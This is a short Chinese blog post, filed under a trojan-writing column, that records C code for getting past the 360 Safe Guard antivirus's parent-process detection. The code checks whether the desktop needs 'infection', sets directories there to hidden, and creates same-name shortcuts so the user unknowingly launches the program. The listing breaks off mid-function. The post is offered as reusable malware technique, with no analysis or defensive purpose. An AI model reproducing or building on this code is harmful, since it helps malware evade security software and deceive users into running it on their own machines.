绕过360安全卫士的部分代码

最新推荐文章于 2022-06-12 21:54:28 发布

冷风

最新推荐文章于 2022-06-12 21:54:28 发布

阅读量7.3k

点赞数

分类专栏：木马编写 C/SDK

本文链接：https://blog.csdn.net/chinafe/article/details/39477997

版权

本文记录了一种通过快捷方式启动程序来绕过360安全卫士父进程查杀的技巧，详细阐述了相关代码的使用和实施步骤。

摘要由CSDN通过智能技术生成

利用快捷方式，由用户启动程序，进行绕过360父进程查杀，代码记录于此处，方便查阅

int bypass_360_startup()
{
	TCHAR str_desktop[256];
	LPITEMIDLIST pidl;
	SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl);//place the shortcut on the desktop
	SHGetPathFromIDList(pidl, str_desktop);

	if (if_need_infection(str_desktop)==0)//是否需要感染
	{
		OutputDebugStringA("bypass_360_startup if_need_infection return");
		return 0;
	}

	if (set_hide_directory(str_desktop)==0)//设置目录为隐藏属性
	{
		OutputDebugStringA("bypass_360_startup set_hide_directory return");
		return 0;
	}

	if (create_link(str_desktop)==0)//创建同名的快捷方式
	{
		OutputDebugStringA("bypass_360_startup create_link return");
		return 0;
	}

	return 0;
}


int if_need_infection(TCHAR str_disk[])
{
	OutputDebugStringA("if_need_infection fun:");
	CSearchFile file;

	file.SearchFile(_T("."),str_disk);

	for (DWORD i=0;i<fil